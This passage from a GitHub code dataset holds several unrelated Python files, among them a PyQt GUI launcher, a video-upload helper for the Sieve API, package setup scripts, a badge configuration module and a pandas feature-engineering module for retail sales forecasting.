\"0.1\"\n version_info = \"\"\n return app_version, version_info\nclass mainwin(QtWidgets.QMainWindow):\n def __init__(self,):\n super(mainwin, self).__init__()\n uic.loadUi('automotion_gui.ui', self)\n self.clicks()\n\n def clicks(self):\n self.start_stop_btn.clicked.connect(mmf.run)\n self.input_image_btn.clicked.connect(mmf._import_pic)\n self.image_proc_btn.clicked.connect(mmf.import_image_processing)\n self.output_graph_btn.clicked.connect(mmf.show_output)\n self.pushButton.clicked.connect(mmf.segmentation)\n self.pre_pro_output_btn.clicked.connect(lambda : mmf.show_pic(mmf.current_image()))\n self.scratch_detection_btn.clicked.connect(mmf.scratch_detection)\n self.pushButton_2.clicked.connect(lambda : mmf.show_pic(mmf.professor.output_image))\n #self.empty.clicked.connect(mmf.reset_all)\n #self.filter_options.clicked.connect(mmf.delete_filter)\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = mainwin()\n log = gui_log(ui)\n app.setStyle(\"fusion\")\n info = \"Hoş Geldiniz ! 
\\nUygulama Sürümü : \" + version_control()[0] + \"\\n\"\n log(info)\n process = professor.professor()\n mmf.load_gui(gui=ui, app=app, wdg=MainWindow, log=log, proc=process) # load class features to mm func module\n mmo.load_gui(ui) # load class gui to menu objects\n ui.show()\n sys.exit(app.exec_())\n","repo_name":"QuAS-Robotic/quatomation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39030413956","text":"#import module/package\r\n#pip install tqdm\r\n\r\n#import the module/package\r\nfrom tqdm import tqdm,trange\r\nimport time\r\n\r\nfor i in tqdm(range(10)):\r\n time.sleep(0.4)\r\n\r\nprint(\"\\n\")\r\nprint (\"Second way to do it\") \r\n\r\nfor i in trange(5):\r\n time.sleep(0.4)","repo_name":"Nishantsingh70/Python_Small_Concept_Questions","sub_path":"ProgressBar.py","file_name":"ProgressBar.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18577555917","text":"import os\nimport requests\n\ndef upload_local_video(api_key, video_file_path):\n # ensure video file exists\n if os.path.isfile(video_file_path) is False:\n raise ValueError('Video file not found')\n\n # get a secure URL to upload the video to\n r = requests.get(\n 'https://api.sievedata.com/v1/create_local_upload_url',\n headers={\n 'X-API-Key': api_key\n }\n )\n request_json = r.json()\n\n # ensure API key is valid\n if 'description' in request_json and request_json['description'] == 'Unauthorized':\n raise ValueError('Invalid Sieve API key')\n \n # upload video to secure storage bucket\n put_url = request_json['upload_url']\n download_url = request_json['get_url']\n\n with open(video_file_path, 'rb') as f:\n r = requests.put(\n put_url,\n data=f,\n headers={\n 'content-type': 'application/octet-stream',\n \"x-goog-content-length-range\": \"0,1000000000\"\n }\n )\n if r.status_code != 200:\n raise ValueError('Failed to upload video to secure storage bucket')\n\n # push video from uploaded URL to Sieve\n r = requests.post(\n \"https://api.sievedata.com/v1/push_video\",\n json={\n \"video_url\": download_url,\n \"project_name\": 'demo_project'\n },\n headers={\n \"X-API-Key\": api_key,\n \"Content-Type\": \"application/json\"\n }\n )\n\n if r.status_code != 200:\n raise ValueError(r.json()['description'])\n","repo_name":"bigdatasciencegroup/automatic-video-processing","sub_path":"sieve_helpers.py","file_name":"sieve_helpers.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6861594345","text":"import setuptools\n\nwith open(\"../README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"pyspark_cicd\", \n version=\"1.1.0\",\n author=\"Sankar Mukherjee\",\n author_email=\"sanmuk21@gmail.com\",\n description=\"PySpark CICD Project\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/sankamuk/pyspark_cicd\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n 
python_requires='>=3.6',\n)\n","repo_name":"sankamuk/pyspark_cicd","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73094106434","text":"import json\n\n\ndef parse():\n \"\"\"parse the json.\n\n 1) convert `map` to `list`.\n 2) fix url error.\n \"\"\"\n with open('data.json', 'r') as f:\n companies = json.loads(f.read())['companies']\n for com in companies:\n com['job_types'] = [k for (k, v) in com['job_types'].items() if v]\n com['degrees'] = [k for (k, v) in com['degrees'].items() if v]\n com['authorizations'] = [k for (k, v) in com['authorizations'].items() if v]\n if com['website'].startswith(\"http://http://\")\\\n or com['website'].startswith(\"http://https://\"):\n com['website'] = com['website'][7:]\n\n with open('another.json', 'w') as f:\n f.write(json.dumps(companies))\n\n\nif __name__ == '__main__':\n parse()\n","repo_name":"yhfyhf/Rock-the-Cornell-Career-Fair","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3175982373","text":"from setuptools import find_packages, setup\n\npackage_name = 'robot_controller'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=find_packages(exclude=['test']),\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='hubot',\n maintainer_email='chen.hub@northeastern.edu',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n \"test_node = robot_controller.test_node:main\",\n \"test_subscriber = robot_controller.test_subscriber:main\",\n \"trajectory_planner = robot_controller.trajectory_planner:main\",\n \"user_interface = robot_controller.user_interface:main\",\n \"plan_executor = robot_controller.plan_executor:main\"\n ],\n },\n)\n","repo_name":"HubotChen/RobotArmV1","sub_path":"src/robot_controller/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16340376999","text":"import ujson as json\n\nCONFIG_FILE = \"/config.json\"\n\nKEY_NAME = 'name'\nKEY_OFFSET = 'offset'\nKEY_WIFI_SSID = 'wifi_ssid'\nKEY_WIFI_PWD = 'wifi_pwd'\nKEY_INVERTED = 'inverted'\nKEY_CURRENT = 'current'\n\nDEFAULT_NAME = 'Ma77D@m0n'\n# Vegas is PST, DEFCON is during daylight savings\nDEFAULT_OFFSET = -7 \n\nDEFAULT_INVERTED = False\n\nDEFAULT_WIFI_SSID = 'Matt Damon'\nDEFAULT_WIFI_PWD = 'WEmustSAVEhim'\n\nDEFAULT_CURRENT = False\n\nconfig = {}\n\ndef load(): \n global config\n try:\n with open(CONFIG_FILE) as cfg_file:\n config = json.load(cfg_file)\n\n # Make sure this value is in config, it's special since it was added late\n # during development and some prototypes won't have it\n if not KEY_CURRENT in config:\n config[KEY_CURRENT] = DEFAULT_CURRENT\n except:\n print(\"CONFIG: Unable to open config file, going with defaults, this is okay! 
See rtfm.md.\")\n save()\n\ndef reset():\n config[KEY_NAME] = DEFAULT_NAME\n config[KEY_OFFSET] = DEFAULT_OFFSET\n config[KEY_WIFI_SSID] = DEFAULT_WIFI_SSID\n config[KEY_WIFI_PWD] = DEFAULT_WIFI_PWD\n config[KEY_INVERTED] = DEFAULT_INVERTED\n config[KEY_CURRENT] = DEFAULT_CURRENT\n\ndef save():\n with open(CONFIG_FILE, 'w') as cfg_file:\n json.dump(config, cfg_file)\n\n# ensure factory defaults on load\nreset()","repo_name":"ANDnXOR/ANDnXOR_DC30_Badge","sub_path":"src/chomper_config.py","file_name":"chomper_config.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"61"} +{"seq_id":"6737972833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------\n# File : cat1_common_derived_features.py\n# Author: liushichang\n# Date : 2021/3/23\n# Desc : 衍生特征\n# Contact : liushichang@meituan.com\n# ----------------------------------\nimport itertools\n\nimport numpy as np\nimport pandas as pd\n\n\nclass DerivedFeature(object):\n def __init__(self, cat1_id, dt_field='dt'):\n self.cat1_id = cat1_id\n self.dt_field = dt_field\n\n @staticmethod\n def get_day_possion_pred(total_data, total_train_data, longtail_data):\n \"\"\"\n 获取泊松分布预测值\n :param total_data: 原始数据\n :param total_train_data: 训练数据\n :param longtail_data: 长尾数据\n :return: 泊松分布结果\n \"\"\"\n\n results = []\n longtail_results = []\n\n for wh_id, df_total_raw in total_data.groupby('wh_id'):\n\n # step1: 非长尾数据处理\n train_data = df_total_raw[df_total_raw.is_train == 1]\n\n # 基准数据\n day_base = pd.DataFrame({'day_abbr': total_train_data['day_abbr'].unique()})\n cat2_base = pd.DataFrame({'cat2_name': total_train_data['cat2_name'].unique()})\n list_base = list(itertools.product(day_base.values.tolist(), cat2_base.values.tolist()))\n df_base = pd.DataFrame(list(map(lambda x: sum(x, []), list_base)), columns=['day_abbr', 'cat2_name'])\n\n # 各品类统计值\n dt_range = train_data.sort_values('dt').dt.unique()[-45:]\n part_train = train_data[train_data.dt.isin(dt_range)]\n count_data = part_train.groupby(['cat2_name', 'day_abbr'], as_index=False)['arranged_cnt'] \\\n .agg({'day_avg': np.mean})\n count_data['day_avg'] += 0.01\n count_data['week_sum'] = count_data.groupby(['cat2_name']).transform(np.sum).iloc[:, -1]\n count_data['sale_ratio'] = count_data['day_avg'] / count_data['week_sum']\n\n # 与基准数据合并,填补空值\n count_data = df_base.merge(count_data, how='left', on=['cat2_name', 'day_abbr'])\n count_data.loc[count_data['day_avg'].isnull() == True, ['day_avg', 'week_sum', 'sale_ratio']] \\\n = [1, 7, 1 / 7]\n\n # 品类销量占比特征\n col = ['cat2_name', 'day_abbr', 'sale_ratio']\n df_total_raw = df_total_raw.merge(count_data[col], how='left', on=['cat2_name', 'day_abbr'])\n\n # 汇总非长尾数据\n results.append(df_total_raw)\n\n # step2: 泊松分布处理\n possion_data = longtail_data[longtail_data.wh_id == wh_id]\n if len(possion_data) == 0:\n continue\n\n # 按天拆分泊松分布预测值\n merged_results = count_data.merge(possion_data, how='left', on='cat2_name')\n merged_results['possion_val_day'] = merged_results['possion_val'] * merged_results['sale_ratio']\n possion_data = merged_results[['bu_id', 'wh_id', 'sku_id', 'day_abbr', 'possion_val_day']].dropna()\n\n # 与测试日期合并\n test_date = df_total_raw[df_total_raw.is_train == 0][['date', 'day_abbr']]\n test_date.drop_duplicates(subset=['date'], keep='first', inplace=True)\n possion_data = possion_data.merge(test_date, how='left', on=['day_abbr'])[\n ['bu_id', 'wh_id', 'sku_id', 'date', 'possion_val_day']\n ]\n\n # 汇总长尾数据\n 
longtail_results.append(possion_data)\n\n return pd.concat(results), pd.concat(longtail_results)\n\n @staticmethod\n def get_seasonal_data(df_train_total, dim_field, col_name):\n \"\"\"\n 分维度计算周期特征\n :param df_train_total: 训练数据\n :param dim_field: 维度字段\n :param col_name: 周期字段\n :return: 特征数据\n \"\"\"\n # 各维度销量均值\n sale_mean = df_train_total.groupby(dim_field, as_index=False).arranged_cnt.mean()\n\n # 星期销量均值/日常销量均值\n if col_name == 'day_abbr':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_week_avg'\n week_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n week_mean = week_mean.merge(sale_mean, how='left', on=[dim_field], suffixes=('_week', '_total'))\n week_mean[new_col_name] = week_mean['arranged_cnt_week'] / week_mean['arranged_cnt_total']\n return week_mean, new_col_name\n\n # 月份销量均值/日常销量均值\n if col_name == 'month':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_month_avg'\n month_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n month_mean = month_mean.merge(sale_mean, how='left', on=[dim_field], suffixes=('_week', '_total'))\n month_mean[new_col_name] = month_mean['arranged_cnt_week'] / month_mean['arranged_cnt_total']\n return month_mean, new_col_name\n\n # 品牌销量均值/日常销量均值\n if col_name == 'brand_name':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_brand_avg'\n brand_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n brand_mean = brand_mean.merge(sale_mean, how='left', on=[dim_field], suffixes=('_week', '_total'))\n brand_mean[new_col_name] = brand_mean['arranged_cnt_week'] / brand_mean['arranged_cnt_total']\n return brand_mean, new_col_name\n\n # 节假日销量均值/日常销量均值\n if col_name == 'festival_name':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_fevl_avg'\n fevl_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n fevl_mean.rename(columns={'arranged_cnt': new_col_name}, inplace=True)\n fevl_mean = fevl_mean.merge(sale_mean)\n fevl_mean[new_col_name] = fevl_mean[new_col_name] / fevl_mean['arranged_cnt']\n del fevl_mean['arranged_cnt']\n return fevl_mean, new_col_name\n\n # 西方节假日销量均值/日常销量均值\n if col_name == 'western_festival_name':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_wfevl_avg'\n wfevl_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n wfevl_mean.rename(columns={'arranged_cnt': new_col_name}, inplace=True)\n wfevl_mean = wfevl_mean.merge(sale_mean)\n wfevl_mean[new_col_name] = wfevl_mean[new_col_name] / wfevl_mean['arranged_cnt']\n del wfevl_mean['arranged_cnt']\n return wfevl_mean, new_col_name\n\n @staticmethod\n def seasonal_count(df_total_raw, df_train_total):\n \"\"\"\n 周期性统计特征\n :param df_total_raw: 原始数据\n :param df_train_total: 训练数据\n :return: 周期性特征数据\n \"\"\"\n dim_field_list = ['wh_id', 'cat1_name', 'cat2_name']\n col_field_list = ['day_abbr', 'month', 'brand_name', 'festival_name', 'western_festival_name']\n\n for dim_field in dim_field_list:\n for col_field in col_field_list:\n feature_data, feature_name = DerivedFeature.get_seasonal_data(df_train_total, dim_field, col_field)\n df_total_raw = df_total_raw.merge(feature_data[[dim_field, col_field, feature_name]],\n how='left', on=[dim_field, col_field])\n return df_total_raw.fillna(0.)\n\n @staticmethod\n def get_sale_ratio(total_data, total_train_data):\n \"\"\"\n 获取销售比率\n :param total_data: 原始数据\n :param total_train_data: 训练数据\n :return: 销售比率结果\n \"\"\"\n\n results = []\n for wh_id, 
df_total_raw in total_data.groupby('wh_id'):\n # step1: 非长尾数据处理\n train_data = df_total_raw[df_total_raw.is_train == 1]\n\n # 基准数据\n day_base = pd.DataFrame({'day_abbr': total_train_data['day_abbr'].unique()})\n cat2_base = pd.DataFrame({'cat2_name': total_train_data['cat2_name'].unique()})\n list_base = list(itertools.product(day_base.values.tolist(), cat2_base.values.tolist()))\n df_base = pd.DataFrame(list(map(lambda x: sum(x, []), list_base)), columns=['day_abbr', 'cat2_name'])\n\n # 各品类统计值\n dt_range = train_data.sort_values('dt').dt.unique()[-45:]\n part_train = train_data[train_data.dt.isin(dt_range)]\n count_data = part_train.groupby(['cat2_name', 'day_abbr'], as_index=False)['arranged_cnt'] \\\n .agg({'day_avg': np.mean})\n count_data['day_avg'] += 0.01\n count_data['week_sum'] = count_data.groupby(['cat2_name']).transform(np.sum).iloc[:, -1]\n count_data['sale_ratio'] = count_data['day_avg'] / count_data['week_sum']\n\n # 与基准数据合并,填补空值\n count_data = df_base.merge(count_data, how='left', on=['cat2_name', 'day_abbr'])\n count_data.loc[count_data['day_avg'].isnull() == True, ['day_avg', 'week_sum', 'sale_ratio']] \\\n = [1, 7, 1 / 7]\n\n # 品类销量占比特征\n col = ['cat2_name', 'day_abbr', 'sale_ratio']\n df_total_raw = df_total_raw.merge(count_data[col], how='left', on=['cat2_name', 'day_abbr'])\n\n results.append(df_total_raw)\n\n return pd.concat(results)\n\n @staticmethod\n def byrs_count(df_total_raw, df_train_total, col_list=None):\n \"\"\"\n 商户数量统计特征\n :param df_total_raw: 原始数据\n :param df_train_total: 原始训练数据\n :param col_list: 商户原始特征(返回时废弃)\n :return: 商户数量统计特征\n \"\"\"\n\n for col in col_list:\n # 要转化的商户特征\n week_col_name = col + '_week_avg'\n month_col_name = col + '_month_avg'\n fevl_col_name = col + '_fevl_avg'\n wfevl_col_name = col + '_wfevl_avg'\n\n # 商户数均值\n _mean = df_train_total[col].mean()\n\n # 星期商户均值/日常商户均值\n _week_mean = df_train_total.groupby(['day_abbr'], as_index=False)[[col]].mean()\n _week_mean[week_col_name] = _week_mean.iloc[:, -1] / _mean\n\n # 月份商户均值/日常商户均值\n _month_mean = df_train_total.groupby(['month'], as_index=False)[[col]].mean()\n _month_mean[month_col_name] = _month_mean.iloc[:, -1] / _mean\n\n # 节假日商户均值/日常商户均值\n _fevl_mean = df_train_total.groupby(['festival_name'], as_index=False)[[col]].mean()\n _fevl_mean[fevl_col_name] = _fevl_mean.iloc[:, -1] / _mean\n\n # 品类西方节假日商户均值/日常商户均值\n _wfevl_mean = df_train_total.groupby(['western_festival_name'], as_index=False)[[col]].mean()\n _wfevl_mean[wfevl_col_name] = _wfevl_mean.iloc[:, -1] / _mean\n\n # 合并数据\n df_total_raw = df_total_raw.merge(_week_mean[['day_abbr', week_col_name]],\n how='left', on=['day_abbr'])\n df_total_raw = df_total_raw.merge(_month_mean[['month', month_col_name]],\n how='left', on=['month'])\n df_total_raw = df_total_raw.merge(_fevl_mean[['festival_name', fevl_col_name]],\n how='left', on=['festival_name'])\n df_total_raw = df_total_raw.merge(_wfevl_mean[['western_festival_name', wfevl_col_name]],\n how='left', on=['western_festival_name'])\n # 返回去除原始商户特征的数据\n return df_total_raw.fillna(0.).drop(col_list, axis=1)\n\n @staticmethod\n def cnt_band_func(df_total_raw):\n \"\"\"\n (根据销量范围)计算商品销量等级\n :param df_total_raw: 原始数据\n :return: 销量等级\n \"\"\"\n # band级数和标签\n cut_num = 4\n label_names = np.arange(cut_num - 1, -1, step=-1)\n df_train = df_total_raw[df_total_raw.is_train == 1].sort_values('dt')\n\n cnt_band_data = [] # 二级品类band中间数据\n qpl_band_data = [] # 全品类band中间数据\n total_data = [] # 返回数据\n dt_set = set() # 防止数据重复\n\n # 以7天为窗口滑动\n dt_range = pd.date_range(df_train.dt.iloc[0], 
df_train.dt.iloc[-1])\n for i in range(7, len(dt_range) + 1):\n # 窗口数据生成\n dt_window = dt_range[i - 7:i]\n window_data = df_train[df_train.dt.isin(dt_window)]\n\n # 跳过无售卖记录期间\n if len(window_data) == 0:\n continue\n\n # 计算窗口内二级品类下各sku销量均值\n cat2_group = window_data.groupby(['cat2_name', 'sku_id'], as_index=False)['arranged_cnt'] \\\n .agg({'arr_mean': np.mean})\n\n # 计算窗口内各sku销量均值\n qpl_group = window_data.groupby('sku_id', as_index=False)['arranged_cnt'] \\\n .agg({'arr_mean': np.mean})\n\n # 用于关联的dt键\n dt_key = window_data.dt.iloc[-1]\n\n # 保存已经滑过的窗口日期\n if dt_key in dt_set:\n continue\n dt_set.add(dt_key)\n\n cat2_group['dt'] = dt_key\n qpl_group['dt'] = dt_key\n\n # 计算二级品类下各sku销量band\n for cat2, group in cat2_group.groupby('cat2_name'):\n cnt_label = pd.cut(group.arr_mean.astype(np.float32), cut_num, precision=2, labels=label_names)\n df_label = pd.DataFrame({'dt': dt_key,\n 'cat2_name': cat2,\n 'sku_id': group.sku_id,\n 'cnt_band_area': cnt_label.astype(np.int32)\n })\n cnt_band_data.append(df_label)\n\n # 计算全品类下各sku销量band\n qpl_cnt_label = pd.cut(qpl_group.arr_mean.astype(np.float32), cut_num, precision=2, labels=label_names)\n qpl_df_label = pd.DataFrame({'dt': dt_key,\n 'sku_id': qpl_group.sku_id,\n 'cnt_band_area_qpl': qpl_cnt_label.astype(np.int32)\n })\n qpl_band_data.append(qpl_df_label)\n\n cnt_band_data = pd.concat(cnt_band_data)\n qpl_band_data = pd.concat(qpl_band_data)\n\n # 合并特征列\n total_data_raw = df_total_raw.merge(cnt_band_data, how='left', on=['dt', 'cat2_name', 'sku_id'])\n total_data_raw = total_data_raw.merge(qpl_band_data, how='left', on=['dt', 'sku_id'])\n\n # 处理空值\n for sku, sku_data in total_data_raw.groupby('sku_id'):\n total_data.append(sku_data.fillna(method='bfill').fillna(method='ffill'))\n\n return pd.concat(total_data)\n\n @staticmethod\n def get_statistic_features(df_total_raw):\n \"\"\"\n sku统计特征\n :param df_total_raw: 原始数据\n :return: sku统计特征\n \"\"\"\n df_total_raw = df_total_raw.sort_values('dt')\n sku_data_list = []\n\n for sku, sku_data in df_total_raw.groupby('sku_id'):\n dt_array = sku_data.dt.unique()\n dt_lenth = len(dt_array)\n\n arr_list = sku_data[sku_data.is_train == 1]['arranged_cnt'].tolist()\n\n # 将数据前移20天\n arr_array = np.concatenate([[arr_list[0]] * 20, arr_list])\n\n # 历史销量\n itvl_avg = arr_array.cumsum() / (pd.Series(arr_array).index + 1)\n\n # 历史销量指数均值\n itvl_ewm_avg = pd.Series(arr_array).ewm(span=4, min_periods=1).mean()\n\n # 滑动窗口统计值\n roll_arr_obj = pd.Series(arr_array).rolling(7, min_periods=1)\n\n itvl_roll_avg = roll_arr_obj.mean() # 销量滑动窗口均值\n itvl_roll_max = roll_arr_obj.max() # 销量滑动窗口最大值\n itvl_roll_min = roll_arr_obj.min() # 销量滑动窗口最小值\n\n sku_data_list.append(pd.DataFrame({'sku_id': [sku] * dt_lenth,\n 'itvl_avg': itvl_avg,\n 'itvl_ewm_avg': itvl_ewm_avg,\n 'itvl_roll_avg': itvl_roll_avg,\n 'itvl_roll_max': itvl_roll_max,\n 'itvl_roll_min': itvl_roll_min,\n 'dt': dt_array\n }))\n\n return df_total_raw.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt'])\n\n @staticmethod\n def pro_statistic_features(data):\n \"\"\"\n 促销统计特征\n :param data: 原始数据\n :return: 促销统计特征\n \"\"\"\n dim_fields = ['brand_name', 'cat1_name', 'cat2_name']\n act_fields = ['seq_num', 'pro_num', 'csu_redu_num']\n\n for dim in dim_fields:\n for act in act_fields:\n col_name = dim[0:dim.rfind('_')] + '_' + act[0:act.rfind('_')] + '_count'\n act_data = data.groupby(['dt', dim], as_index=False)[act].agg({col_name: np.sum})\n data = data.merge(act_data, how='left', on=['dt', dim])\n return data.fillna(0.)\n\n @staticmethod\n def 
price_derived_features(df_total_raw):\n \"\"\"\n 价格衍生特征制造\n :param df_total_raw: 原始数据\n :return: 价格特征\n \"\"\"\n # 差价特征\n # 促销活动差价\n df_total_raw['sp_pdiff'] = df_total_raw['seq_price'] - df_total_raw['discount_price']\n # 真实差价\n df_total_raw['real_pdiff'] = df_total_raw['csu_origin_price'] - df_total_raw['w_price']\n\n # 折扣力度\n price_diff_seq = df_total_raw['csu_origin_price'] - df_total_raw['seq_price']\n price_diff_pro = df_total_raw['csu_origin_price'] - df_total_raw['discount_price']\n price_diff_real = df_total_raw['csu_origin_price'] - df_total_raw['w_price']\n\n # 秒杀折扣\n df_total_raw['seq_rebate'] = price_diff_seq / df_total_raw['csu_origin_price']\n # 促销折扣\n df_total_raw['pro_rebate'] = price_diff_pro / df_total_raw['csu_origin_price']\n # 实际折扣\n df_total_raw['real_rebate'] = price_diff_real / df_total_raw['csu_origin_price']\n\n # 竞品折扣\n # 竞品秒杀力度\n seq_data = df_total_raw.groupby(['dt', 'cat2_name'], as_index=False)['seq_rebate'] \\\n .agg({'max_seq_rebate': np.max,\n 'mean_seq_rebate': np.mean})\n # 竞品单品促销力度\n pro_data = df_total_raw.groupby(['dt', 'cat2_name'], as_index=False)['pro_rebate'] \\\n .agg({'max_pro_rebate': np.max,\n 'mean_pro_rebate': np.mean})\n # 竞品实际折扣\n real_data = df_total_raw.groupby(['dt', 'cat2_name'], as_index=False)['real_rebate'] \\\n .agg({'max_real_rebate': np.max,\n 'mean_real_rebate': np.mean})\n\n # 合并数据\n rebate_data = seq_data.merge(pro_data, how='outer', on=['dt', 'cat2_name'])\n rebate_data = rebate_data.merge(real_data, how='outer', on=['dt', 'cat2_name'])\n df_total_raw = df_total_raw.merge(rebate_data, how='left', on=['dt', 'cat2_name']) \\\n .fillna(0.) \\\n .sort_values('dt')\n\n # 滑动(加权)价格特征\n sku_data_list = []\n for sku, sku_data in df_total_raw.groupby('sku_id'):\n df_sku = sku_data[sku_data.is_train == 1]\n\n # 7天滑动(加权)价格均值\n price_7d_roll = df_sku['w_price'].rolling(7, min_periods=1).mean()\n\n # T+0数据\n mov_price_avg = np.insert(np.array(price_7d_roll), 0, price_7d_roll.iloc[0], axis=0)\n\n # 外推覆盖未来20天\n price_list = np.append(df_sku['w_price'], price_7d_roll.iloc[-1])\n for i in range(19):\n if len(price_list) < 7:\n avg_7d = np.mean(price_list)\n else:\n avg_7d = np.mean(price_list[-7:])\n price_list = np.append(price_list, avg_7d)\n mov_price_avg = np.concatenate([mov_price_avg, price_list[-19:]])\n\n sku_data_list.append(pd.DataFrame({'sku_id': sku,\n 'dt': sku_data.dt.unique(),\n 'mov_price_avg': mov_price_avg\n }))\n # 合并sku数据\n df_total_raw = df_total_raw.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt'])\n # 原价/滑动价格差价\n df_total_raw['mov_delta_cprice'] = df_total_raw['csu_origin_price'] - df_total_raw['mov_price_avg']\n # 加权价/滑动价格差价\n df_total_raw['mov_delta_wprice'] = df_total_raw['w_price'] - df_total_raw['mov_price_avg']\n\n return df_total_raw\n\n @staticmethod\n def get_price_elasticity(df_total_raw):\n \"\"\"\n 价格弹性计算\n :param df_total_raw: 原始数据\n :return: 价格弹性系数\n \"\"\"\n df_total_raw = df_total_raw.sort_values('dt')\n\n # 赋初始值\n ed_dic = {sku: 0. 
for sku in df_total_raw.sku_id.unique()}\n\n # 过滤满减数据\n df_ed = df_total_raw[(df_total_raw.is_train == 1) &\n (df_total_raw.csu_redu_num == 0) &\n (df_total_raw.arranged_cnt > 0)]\n\n # 计算价格弹性系数\n for sku, sku_train in df_ed.groupby('sku_id'):\n # 数据量限制\n if len(sku_train) < 15:\n continue\n # 使用滑动均值价格\n price_and_arr = sku_train[['w_price', 'arranged_cnt']].rolling(15, min_periods=15).mean()\n\n # 价格和销量变动值\n _delta = (price_and_arr - price_and_arr.shift(1)).rename(columns={'w_price': 'delta_price',\n 'arranged_cnt': 'delta_arr'})\n # 合并两部分数据\n _delta = price_and_arr.join(_delta.shift(-1)).dropna()\n _delta = _delta[_delta.delta_price != 0]\n\n # 过滤价格无波动的sku\n if len(_delta) == 0:\n continue\n\n # 计算价格弹性系数\n darr = _delta['delta_arr']\n arr = _delta['arranged_cnt']\n dp = _delta['delta_price']\n p = _delta['w_price']\n ed = -(darr / arr) / (dp / p)\n\n # 过滤弹性系数中的异常值\n Q1 = np.percentile(ed, 25)\n Q3 = np.percentile(ed, 75)\n step = (Q3 - Q1) * 1.5\n mean_ed = ed[(ed <= Q3 + step) & (ed >= Q1 - step)].mean()\n\n # 更新弹性系数\n if not np.isnan(mean_ed):\n ed_dic[sku] = mean_ed\n\n # 生成价格弹性特征\n ed_list = [[sku_id, ed_dic[sku_id]] for sku_id in ed_dic.keys()]\n df_ed = pd.DataFrame(ed_list, columns=['sku_id', 'ed_val'])\n\n return df_total_raw.merge(df_ed, how='left', on=['sku_id']).sort_values('dt')\n\n @staticmethod\n def ed_pred_sale(df_total_raw):\n \"\"\"\n 价格弹性销量\n :param df_total_raw: (含价格弹性特征的)原始数据\n :return: 价格弹性销量\n \"\"\"\n df_total_raw = df_total_raw.sort_values('dt')\n sku_data_list = []\n\n for sku, sku_data in df_total_raw.groupby('sku_id'):\n # 获取弹性系数\n ed_val = sku_data['ed_val'].unique()[0]\n\n _shift = sku_data[['w_price', 'arranged_cnt']].shift(1) \\\n .rename(columns={'w_price': 'last_price',\n 'arranged_cnt': 'last_arr'})\n _shift = _shift.join(sku_data[['w_price', 'arranged_cnt', 'is_train']])\n\n # 修正测试集数据\n last_price = sku_data[sku_data.is_train == 1]['w_price'].iloc[-1]\n last_arr = sku_data[sku_data.is_train == 1]['arranged_cnt'].iloc[-1]\n _shift.loc[_shift.is_train == 0, 'last_price'] = last_price\n _shift.loc[_shift.is_train == 0, 'last_arr'] = last_arr\n\n # 价格一阶差分\n _shift['delta_price'] = _shift['w_price'] - _shift['last_price']\n\n # 填补缺失值\n _shift.loc[_shift['last_price'].isnull() == True, 'last_price'] \\\n = _shift.loc[_shift['last_price'].isnull() == True, 'w_price']\n\n _shift.loc[_shift['last_arr'].isnull() == True, 'last_arr'] \\\n = _shift.loc[_shift['last_arr'].isnull() == True, 'arranged_cnt']\n\n _shift.loc[_shift['delta_price'].isnull() == True, 'delta_price'] = 0.\n\n # 计算销量\n lp = _shift['last_price']\n _delta_p = _shift['delta_price']\n la = _shift['last_arr']\n dp = _delta_p / lp\n ed_pred_arr = la * (1 - dp * ed_val)\n\n # 后处理\n ed_pred_arr[ed_pred_arr < 0] = 0\n sku_data = sku_data.join(pd.DataFrame(_shift['delta_price'], columns=['delta_price'])) \\\n .join(pd.DataFrame(ed_pred_arr, columns=['ed_pred_arr'])) \\\n .fillna(method='bfill') \\\n .fillna(method='ffill')\n sku_data_list.append(sku_data)\n\n return pd.concat(sku_data_list)\n\n @staticmethod\n def get_price_statistic_features(df_total_raw):\n \"\"\"\n 价格弹性衍生特征\n :param df_total_raw: (含价格弹性特征的)原始数据\n :return: 价格弹性(价格、销量)衍生特征\n 